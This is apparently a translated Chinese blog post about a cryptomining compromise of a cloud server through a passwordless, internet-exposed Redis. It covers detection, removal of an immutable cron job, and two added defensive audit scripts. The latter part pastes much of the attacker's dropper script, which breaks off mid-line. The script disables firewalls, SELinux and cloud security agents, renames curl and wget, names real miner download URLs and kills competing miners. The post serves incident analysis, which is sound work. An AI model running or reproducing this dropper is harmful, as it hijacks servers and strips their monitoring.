
Still running Redis on the public internet without a password? You must be crazy

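  Friends, I have a Huawei Cloud Yunyao (云耀) server. With nothing better to do, I installed Redis on it for some testing and research, and it got attacked. This is the first time I have run into this, because my earlier environments were mostly on internal networks.

  Symptoms

  I had worked quite late the day before and left my computer on, so the next day I was going to tidy it up and close the software I wasn't using for the moment. When I got to the FTP remote tool, I was suddenly wide awake. Take a look:
  That woke me right up. This server only has one MySQL and one Redis on it, and they are basically not in use, so how was the memory completely full and the CPU about half used? I immediately thought I might have been attacked.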
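  Logging in to the Huawei Cloud console

  The first thing I thought of was to log in to the console and see when the attack started.
  As the figure above shows, it started at around 22:40 the previous night.
  What surprised me is: does Huawei Cloud have no alerting mechanism? A sudden flood of traffic came in and the server's memory filled up, yet it gave no notification at all and still showed "no risk" here: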
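  Finding the problem

  The most important thing right now is to find where the attack came in. Actually I knew very well: it had to be the Redis I installed yesterday. There are two main reasons:
  - The security group allowed inbound access from all IPs
  - No password was set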
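  Both causes leave traces in redis.conf. As an added example (not part of the original post), the script below flags a wildcard bind, a disabled protected-mode, a missing requirepass and an empty logfile. The function names and finding labels are made up for this example.

```shell
#!/bin/sh
# Added example, not from the original post. Function names and finding
# labels (BIND_ALL, ...) are made up for this illustration.

# Print the effective value of a redis.conf directive: comment lines are
# skipped and the last occurrence wins.
redis_conf_get() {   # $1 = config file, $2 = directive name in lower case
    awk -v key="$2" '
        /^[[:space:]]*#/ || NF == 0 { next }
        tolower($1) == key {
            $1 = ""; sub(/^[[:space:]]+/, ""); val = $0; found = 1
        }
        END { if (found) print val }
    ' "$1"
}

# Print one line per risky setting; return 1 if anything was flagged.
audit_redis_conf() {
    conf=$1
    rc=0
    # A leading "-" only marks an address as optional (e.g. -::1): drop it.
    bind=$(redis_conf_get "$conf" bind | sed 's/-//g')
    protected=$(redis_conf_get "$conf" protected-mode | tr 'A-Z' 'a-z')
    pass=$(redis_conf_get "$conf" requirepass | tr -d "\"'")
    logfile=$(redis_conf_get "$conf" logfile | tr -d "\"'")

    # No bind line at all, or a wildcard address, means every interface is
    # listening (the "redis-server *:6379" form in a ps listing).
    case " $bind " in
        "  "|*" 0.0.0.0 "*|*" * "*|*" :: "*|*" ::* "*)
            echo "BIND_ALL: listening on all interfaces (bind='$bind')"
            rc=1 ;;
    esac

    # protected-mode defaults to yes; only an explicit "no" is flagged.
    if [ "$protected" = "no" ]; then
        echo "PROTECTED_MODE_OFF: loopback-only safety net is disabled"
        rc=1
    fi

    # Only requirepass is examined; ACL users (Redis 6+) are not.
    if [ -z "$pass" ]; then
        echo "NO_PASSWORD: requirepass is not set"
        rc=1
    fi

    # An empty logfile means stdout, which is discarded when daemonized.
    if [ -z "$logfile" ]; then
        echo "NO_LOGFILE: nothing will be left to read after an incident"
        rc=1
    fi
    return $rc
}

# Usage: sh audit_redis.sh /path/to/redis.conf
if [ -n "${1:-}" ]; then
    audit_redis_conf "$1" || exit 1
fi
```

  Each finding is reported on its own because the exact effect of protected-mode depends on the Redis version; a cloud security group open to all IPs has to be checked separately in the provider's console.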
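  So let's go see what Redis looks like.
  I connected with a client tool and found that all the keys were gone, replaced by the following content:
  Given that, we might as well look at the Redis log file to see what it went through. Where is the log? I checked its path in the configuration file and found I had not configured it; it was still at the default location, /dev/null:
  What does that mean? It's telling me: who told you not to configure logging? Now that you want to look, there is simply nothing there.

  Fixing the problem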
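  Given that, let's just fix the problem directly. The first thing I thought of was to kill the Redis process:

    [root@hecs-402944 myredis]# ps -ef|grep redis
    root     12810 10424  0 10:30 pts/0    00:00:00 grep --color=auto redis
    root     21392     1  0 3月02 ?       00:01:19 redis-server *:6379
    [root@hecs-402944 myredis]# kill -9 21392

  Then you will find that it doesn't help at all: both CPU and memory stay high. I didn't even know how to fix it, so I just rebooted the server. Rebooting works wonders; the occupied resources were finally released.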
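  But after a while the memory usage went up again, so clearly things were not that simple. In the script content found in Redis earlier you can spot a cron expression, so there must be a scheduled task running over and over. Following this lead, I looked at which scheduled tasks were on the server:

    [root@hecs-402944 ~]# crontab -l
    */30 * * * * sh /etc/newinit.sh >/dev/null 2>&1

  There is only one, so it has to be it. Let's stop it first and then see what it actually contains.

    [root@hecs-402944 etc]# rm -rf newinit.sh
    rm: 无法删除"newinit.sh": 不允许的操作

  Well, I'll be. Deletion is not permitted.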
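  Use the following command to inspect the file:

    lsattr newinit.sh
    ----ia-------e-- newinit.sh

  What does this "ia" mean?
  - a: Append Only. The system only allows data to be appended to the file and does not allow any process to overwrite or truncate it. If a directory has this attribute, the system only allows files to be created and modified in that directory and does not allow any file to be deleted.
  - i: Immutable. The system does not allow any modification of the file. If a directory has this attribute, processes can only modify the files under the directory and are not allowed to create or delete files.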
  Change this permission:

    [root@hecs-402944 etc]# chattr -ia newinit.sh
    -bash: /usr/bin/chattr: 权限不够

  It won't let me change the permission… so use the method below to create a fresh copy, chattr2:

    [root@hecs-402944 etc]# cp /usr/bin/chattr /usr/bin/chattr2
    [root@hecs-402944 etc]# chmod 755 /usr/bin/chattr2
    [root@hecs-402944 etc]# chattr2 -i /usr/bin/chattr
    [root@hecs-402944 etc]# chmod 755 /usr/bin/chattr
    [root@hecs-402944 etc]# ls -la /usr/bin/chattr
    -rwxr-xr-x 1 root root 11536 9月  30 2020 /usr/bin/chattr
    [root@hecs-402944 etc]# lsattr /usr/bin/chattr
    -------------e-- /usr/bin/chattr

  Now use chattr2 to change the attributes, then delete the scheduled-task file again, and this time it succeeds.

    chattr2 -ia newinit.sh
  Stopping the scheduled task turned out not to be permitted either. Truly ruthless~ Do it as follows. First change the permissions:

    [root@hecs-402944 etc]# lsattr /var/spool/cron/root
    ----ia-------e-- /var/spool/cron/root
    [root@hecs-402944 etc]# chattr2 -ia /var/spool/cron/root

  Delete the scheduled task and check that it is gone:

    [root@hecs-402944 etc]# crontab -r
    [root@hecs-402944 etc]# crontab -l
    no crontab for root
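  The checks from the steps above, collected into one triage script as an added example (not part of the original post): it lists files carrying the i or a attribute among the cron files, the chattr binary and every script a cron entry points to. The function names are made up for this example, and the directory list is an assumption that should be adapted to the distribution.

```shell
#!/bin/sh
# Added example, not from the original post. Function names are made up;
# the scanned paths are the ones that appear in the write-up plus the usual
# cron locations (an assumption, adjust per distribution).

# Read lsattr output on stdin and print "<flags> <path>" for every entry
# with i (immutable) or a (append-only) set. The e (extents) flag is normal
# on ext4 and is ignored, as are lsattr error lines.
locked_entries() {
    awk '
        NF >= 2 && $1 ~ /^[-A-Za-z]+$/ {
            flags = ""
            if (index($1, "i")) flags = flags "i"
            if (index($1, "a")) flags = flags "a"
            if (flags != "") {
                path = $0
                sub(/^[^[:space:]]+[[:space:]]+/, "", path)
                print flags, path
            }
        }'
}

# Read crontab text on stdin and print each absolute path that appears in a
# command, skipping comments, variable assignments and /dev/* redirections.
cron_targets() {
    awk '
        /^[[:space:]]*(#|$)/ { next }
        $1 ~ /^[A-Za-z_]+=/ { next }
        {
            start = ($1 ~ /^@/) ? 2 : 6
            for (i = start; i <= NF; i++) {
                tok = $i
                sub(/^[<>&0-9]+/, "", tok)      # strip ">", "2>", "<" prefixes
                if (tok ~ /^\// && tok !~ /^\/dev\//) print tok
            }
        }' | sort -u
}

# Run the live checks. Needs root to read other users crontabs.
scan_persistence() {
    command -v lsattr >/dev/null 2>&1 || { echo "lsattr not found" >&2; return 2; }

    # In the incident above chattr itself had been locked and could not run.
    [ -x /usr/bin/chattr ] || echo "WARN /usr/bin/chattr is not executable"

    {
        lsattr -d /usr/bin/chattr /etc/crontab 2>/dev/null
        lsattr -R /var/spool/cron /etc/cron.d 2>/dev/null
        # Follow every cron entry to the script it runs and check that too.
        for f in /var/spool/cron/* /var/spool/cron/crontabs/* \
                 /etc/crontab /etc/cron.d/*; do
            [ -f "$f" ] && cron_targets < "$f"
        done | while read -r p; do
            lsattr -d "$p" 2>/dev/null
        done
    } | locked_entries | sort -u
}

# Usage: sh cron_triage.sh --scan
if [ "${1:-}" = "--scan" ]; then
    scan_persistence
fi
```

  An immutable crontab or cron target is rarely legitimate, so any line this prints deserves a look before the attributes are cleared and the file removed.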
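  Reboot the server, and it is finally solved.

  What did the scheduled-task file do?

  I'll just paste it here; brothers, see for yourselves. It is alarming to read.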
  #!/bin/sh ulimit -n 65535 chmod 777 /usr/bin/chattr chmod 777 /bin/chattr iptables -F ufw disable sysctl kernel.nmi_watchdog=0 echo "0" >/proc/sys/kernel/nmi_watchdog echo "kernel.nmi_watchdog=0" >>/etc/sysctl.conf chattr -iae /root/.ssh/ chattr -iae /root/.ssh/authorized_keys chattr -iua /tmp/ chattr -iua /var/tmp/ rm -rf /tmp/addres* rm -rf /tmp/walle* rm -rf /tmp/keys rm -rf /var/log/syslog  crondir="/var/spool/cron/""$USER" cont=`cat ${crondir}` ssht=`cat /root/.ssh/authorized_keys` echo 1 > /etc/zzhs rtdir="/etc/zzhs" bbdir="/usr/bin/curl" bbdira="/usr/bin/cd1" ccdir="/usr/bin/wget" ccdira="/usr/bin/wd1"  mv /usr/bin/wgettnt /usr/bin/wd1 mv /usr/bin/curltnt /usr/bin/cd1 mv /usr/bin/wget1 /usr/bin/wd1 mv /usr/bin/curl1 /usr/bin/cd1 mv /usr/bin/cur /usr/bin/cd1 mv /usr/bin/cdl /usr/bin/cd1 mv /usr/bin/cdt /usr/bin/cd1 mv /usr/bin/xget /usr/bin/wd1 mv /usr/bin/wge /usr/bin/wd1 mv /usr/bin/wdl /usr/bin/wd1 mv /usr/bin/wdt /usr/bin/wd1 mv /usr/bin/wget /usr/bin/wd1 mv /usr/bin/curl /usr/bin/cd1  if ps aux | grep -i "[a]liyun"; then   $bbdir http://update.aegis.aliyun.com/download/uninstall.sh | bash   $bbdir http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash   $bbdira http://update.aegis.aliyun.com/download/uninstall.sh | bash   $bbdira http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash   pkill aliyun-service   rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service   rm -rf /usr/local/aegis*   systemctl stop aliyun.service   systemctl disable aliyun.service   service bcm-agent stop   yum remove bcm-agent -y   apt-get remove bcm-agent -y elif ps aux | grep -i "[y]unjing"; then   /usr/local/qcloud/stargate/admin/uninstall.sh   /usr/local/qcloud/YunJing/uninst.sh   /usr/local/qcloud/monitor/barad/admin/uninstall.sh fi  if [ -f /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh ]; then   /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop && /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove && rm -rf 
/usr/local/cloudmonitor   else   export ARCH=amd64   if [ -f /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} ]; then     /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} stop && /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} uninstall && rm -rf /usr/local/cloudmonitor    else     echo "ali cloud monitor not running"   fi fi  setenforce 0 echo SELINUX=disabled >/etc/selinux/config service apparmor stop systemctl disable apparmor service aliyun.service stop systemctl disable aliyun.service ps aux | grep -v grep | grep "aegis" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "Yun" | awk "{print $2}" | xargs -I % kill -9 %  rm -rf /usr/local/aegis  miner_url="http://195.242.111.238/cleanfda/zzh" miner_url_backup="http://en2an.top:8080/cleanfda/zzh" miner_size="6006304" sh_url="http://195.242.111.238/cleanfda/newinit.sh" sh_url_backup="http://en2an.top:8080/cleanfda/newinit.sh" chattr_size="8000"  sleep 1  if [ -x "$(command -v t)" ]; then mv /usr/bin/t /usr/bin/chattr fi  if [ -x "$(command -v chattr)" ]; then chattr -i /usr/bin/ip6network chattr -i /usr/bin/kswaped chattr -i /usr/bin/irqbalanced chattr -i /usr/bin/rctlcli chattr -i /usr/bin/systemd-network chattr -i /usr/bin/pamdicks echo 1 > /usr/bin/ip6network echo 2 > /usr/bin/kswaped echo 3 > /usr/bin/irqbalanced echo 4 > /usr/bin/rctlcli echo 5 > /usr/bin/systemd-network echo 6 > /usr/bin/pamdicks chattr +i /usr/bin/ip6network chattr +i /usr/bin/kswaped chattr +i /usr/bin/irqbalanced chattr +i /usr/bin/rctlcli chattr +i /usr/bin/systemd-network chattr +i /usr/bin/pamdicks fi sleep 1  kill_miner_proc() { netstat -anp | grep 185.71.65.238 | awk "{print $7}" | awk -F"[/]" "{print $1}" | xargs -I % kill -9 % netstat -anp | grep 140.82.52.87 | awk "{print $7}" | awk -F"[/]" "{print $1}" | xargs -I % kill -9 % netstat -anp | grep :443 | awk "{print $7}" | awk -F"[/]" "{print $1}" | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :23 | awk "{print $7}" | awk -F"[/]" "{print $1}" | grep -v 
"-" | xargs -I % kill -9 % netstat -anp | grep :443 | awk "{print $7}" | awk -F"[/]" "{print $1}" | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :143 | awk "{print $7}" | awk -F"[/]" "{print $1}" | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :2222 | awk "{print $7}" | awk -F"[/]" "{print $1}" | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :3333 | awk "{print $7}" | awk -F"[/]" "{print $1}" | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :3389 | awk "{print $7}" | awk -F"[/]" "{print $1}" | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :5555 | awk "{print $7}" | awk -F"[/]" "{print $1}" | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :6666 | awk "{print $7}" | awk -F"[/]" "{print $1}" | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :6665 | awk "{print $7}" | awk -F"[/]" "{print $1}" | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :6667 | awk "{print $7}" | awk -F"[/]" "{print $1}" | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :7777 | awk "{print $7}" | awk -F"[/]" "{print $1}" | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :8444 | awk "{print $7}" | awk -F"[/]" "{print $1}" | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :3347 | awk "{print $7}" | awk -F"[/]" "{print $1}" | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :10008 | awk "{print $7}" | awk -F"[/]" "{print $1}" | grep -v "-" | xargs -I % kill -9 % ps.original aux | grep -v grep | grep ":13531" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep ":3333" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep ":5555" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "kworker -c" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "log_" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "systemten" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "netns" | awk "{print $2}" | xargs 
-I % kill -9 % ps aux | grep -v grep | grep "voltuned" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "darwin" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "/tmp/dl" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "/tmp/ddg" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "/tmp/pprt" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "/tmp/ppol" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "/tmp/65ccE*" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "/tmp/jmx*" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "/tmp/2Ne80*" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "IOFoqIgyC0zmf2UR" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "45.76.122.92" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "51.38.191.178" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "51.15.56.161" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "86s.jpg" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "aGTSGJJp" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "nMrfmnRa" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "PuNY5tm2" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "I0r8Jyyt" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "AgdgACUD" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "uiZvwxG8" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "hahwNEdB" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "BtwXn5qH" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "3XEzey2T" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "t2tKrCSZ" | awk "{print $2}" | xargs -I % 
kill -9 % ps aux | grep -v grep | grep "HD7fcBgg" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "zXcDajSs" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "3lmigMo" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "AkMK4A2" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "AJ2AkKe" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "HiPxCJRS" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "http_0xCC030" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "http_0xCC031" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "http_0xCC032" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "http_0xCC033" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "C4iLM4L" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "aziplcr72qjhzvin" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | awk "{ if(substr($11,1,2)=="./" && substr($12,1,2)=="./") print $2 }" | xargs -I % kill -9 % ps aux | grep -v grep | grep "/boot/vmlinuz" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "i4b503a52cc5" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "dgqtrcst23rtdi3ldqk322j2" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "2g0uv7npuhrlatd" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "nqscheduler" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "rkebbwgqpl4npmm" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep "]" | awk "$3>10.0{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "2fhtu70teuhtoh78jc5s" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "0kwti6ut420t" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "44ct7udt0patws3agkdfqnjm" | 
awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep -v "/" | grep -v "-" | grep -v "_" | awk "length($11)>19{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "[^" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "rsync" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "watchd0g" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | egrep "wnTKYg|2t3ik|qW3xT.2|ddg" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "158.69.133.18:8220" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "/tmp/java" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "gitee.com" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "/tmp/java" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "104.248.4.162" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "89.35.39.78" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "/dev/shm/z3.sh" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "kthrotlds" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "ksoftirqds" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "netdns" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "watchdogs" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "kdevtmpfsi" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "kinsing" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "redis2" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep " ps" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "sync_supers" | cut -c 9-15 | xargs -I % kill -9 % ps aux | grep -v grep | grep "cpuset" | cut -c 9-15 | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep "x]" | awk "{print $2}" | xargs -I % 
kill -9 % ps aux | grep -v grep | grep -v aux | grep "sh] <" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep " []" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "/tmp/l.sh" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "/tmp/zmcat" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "hahwNEdB" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "CnzFVPLF" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "CvKzzZLs" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "aziplcr72qjhzvin" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "/tmp/udevd" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "sustse" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "sustse3" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "mr.sh" | grep "wget" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "mr.sh" | grep "curl" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "2mr.sh" | grep "wget" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "2mr.sh" | grep "curl" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "cr5.sh" | grep "wget" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "cr5.sh" | grep "curl" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "logo9.jpg" | grep "wget" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "logo9.jpg" | grep "curl" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | 
grep "j2.conf" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "luk-cpu" | grep "wget" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "luk-cpu" | grep "curl" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "ficov" | grep "wget" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "ficov" | grep "curl" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "he.sh" | grep "wget" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "he.sh" | grep "curl" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "miner.sh" | grep "wget" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "miner.sh" | grep "curl" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "nullcrew" | grep "wget" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "nullcrew" | grep "curl" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "107.174.47.156" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "83.220.169.247" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "51.38.203.146" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "144.217.45.45" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "107.174.47.181" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "176.31.6.16" | awk "{print $2}" | xargs -I % kill -9 % ps auxf | grep -v grep | grep "mine.moneropool.com" | awk "{print $2}" | xargs -I % kill -9 % ps auxf | grep -v grep | grep "pool.t00ls.ru" | awk "{print $2}" | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk "{print $2}" | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk "{print $2}" | xargs -I % kill -9 % ps auxf | grep -v grep | grep "zhuabcn@yahoo.com" | awk "{print $2}" | xargs -I % kill -9 % ps 
auxf | grep -v grep | grep "monerohash.com" | awk "{print $2}" | xargs -I % kill -9 % ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk "{print $2}" | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk "{print $2}" | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk "{print $2}" | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk "{print $2}" | xargs -I % kill -9 % ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk "{print $2}" | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmrpool.eu" | awk "{print $2}" | xargs -I % kill -9 % ps auxf | grep -v grep | grep "kieuanilam.me" | awk "{print $2}" | xargs -I % kill -9 % ps auxf | grep xiaoyao | awk "{print $2}" | xargs -I % kill -9 % ps auxf | grep xiaoxue | awk "{print $2}" | xargs -I % kill -9 % netstat -antp | grep "46.243.253.15" | grep "ESTABLISHED|SYN_SENT" | awk "{print $7}" | sed -e "s//.*//g" | xargs -I % kill -9 % netstat -antp | grep "176.31.6.16" | grep "ESTABLISHED|SYN_SENT" | awk "{print $7}" | sed -e "s//.*//g" | xargs -I % kill -9 % pgrep -f L2Jpbi9iYXN | xargs -I % kill -9 % pgrep -f xzpauectgr | xargs -I % kill -9 % pgrep -f slxfbkmxtd | xargs -I % kill -9 % pgrep -f mixtape | xargs -I % kill -9 % pgrep -f addnj | xargs -I % kill -9 % pgrep -f 200.68.17.196 | xargs -I % kill -9 % pgrep -f IyEvYmluL3NoCgpzUG | xargs -I % kill -9 % pgrep -f KHdnZXQgLXFPLSBodHRw | xargs -I % kill -9 % pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3 | xargs -I % kill -9 % pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo | xargs -I % kill -9 % pgrep -f mwyumwdbpq.conf | xargs -I % kill -9 % pgrep -f honvbsasbf.conf | xargs -I % kill -9 % pgrep -f mqdsflm.cf | xargs -I % kill -9 % pgrep -f lower.sh | xargs -I % kill -9 % pgrep -f ./ppp | xargs -I % kill -9 % pgrep -f cryptonight | xargs -I % kill -9 % pgrep -f ./seervceaess | xargs -I % kill -9 % pgrep -f ./servceaess | xargs -I % kill -9 % pgrep -f 
./servceas | xargs -I % kill -9 % pgrep -f ./servcesa | xargs -I % kill -9 % pgrep -f ./vsp | xargs -I % kill -9 % pgrep -f ./jvs | xargs -I % kill -9 % pgrep -f ./pvv | xargs -I % kill -9 % pgrep -f ./vpp | xargs -I % kill -9 % pgrep -f ./pces | xargs -I % kill -9 % pgrep -f ./rspce | xargs -I % kill -9 % pgrep -f ./haveged | xargs -I % kill -9 % pgrep -f ./jiba | xargs -I % kill -9 % pgrep -f ./watchbog | xargs -I % kill -9 % pgrep -f ./A7mA5gb | xargs -I % kill -9 % pgrep -f kacpi_svc | xargs -I % kill -9 % pgrep -f kswap_svc | xargs -I % kill -9 % pgrep -f kauditd_svc | xargs -I % kill -9 % pgrep -f kpsmoused_svc | xargs -I % kill -9 % pgrep -f kseriod_svc | xargs -I % kill -9 % pgrep -f kthreadd_svc | xargs -I % kill -9 % pgrep -f ksoftirqd_svc | xargs -I % kill -9 % pgrep -f kintegrityd_svc | xargs -I % kill -9 % pgrep -f jawa | xargs -I % kill -9 % pgrep -f oracle.jpg | xargs -I % kill -9 % pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN | xargs -I % kill -9 % pgrep -f 188.209.49.54 | xargs -I % kill -9 % pgrep -f 181.214.87.241 | xargs -I % kill -9 % pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ | xargs -I % kill 